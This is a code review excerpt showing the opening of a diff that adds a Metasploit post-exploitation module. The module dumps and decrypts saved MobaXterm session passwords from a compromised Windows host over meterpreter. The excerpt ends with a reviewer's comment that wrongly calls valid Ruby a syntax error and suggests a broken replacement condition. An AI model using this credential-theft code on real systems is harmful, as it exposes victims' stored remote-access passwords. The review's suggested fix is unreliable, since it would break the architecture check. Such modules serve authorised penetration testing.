modules/post/windows/gather/credentials/moba_xterm.rb

```diff
@@ -0,0 +1,330 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather MobaXterm Passwords',
+        'Description' => %q{
+          This module will determine if MobaXterm is installed on the target system and, if it is, it will try to
+          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+          where possible, using the decryption information that HyperSine reverse engineered.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_railgun_api_multi
+              stdapi_railgun_memread
+              stdapi_railgun_memwrite
+              stdapi_sys_process_get_processes
+            ]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('MASTER_PASSWORD', [ false, 'If you know the password, you can skip decrypting the master password. If not, it will be decrypted automatically']),
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MobaXterm']),
+      ]
+    )
+  end
+
+  def windows_unprotect(entropy, data)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    mem = process.memory.allocate(data.length)
+    addr_entropy = session.railgun.util.alloc_and_write_string(entropy)
+    process.memory.write(mem, data)
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
```

Comment:
```suggestion
    if session.sys.process.each_process.find { |i| i['pid'] == pid } && ['arch'] == 'x86'
```
This is syntactically incorrect. Are you trying to `&&`  the result of these two conditions??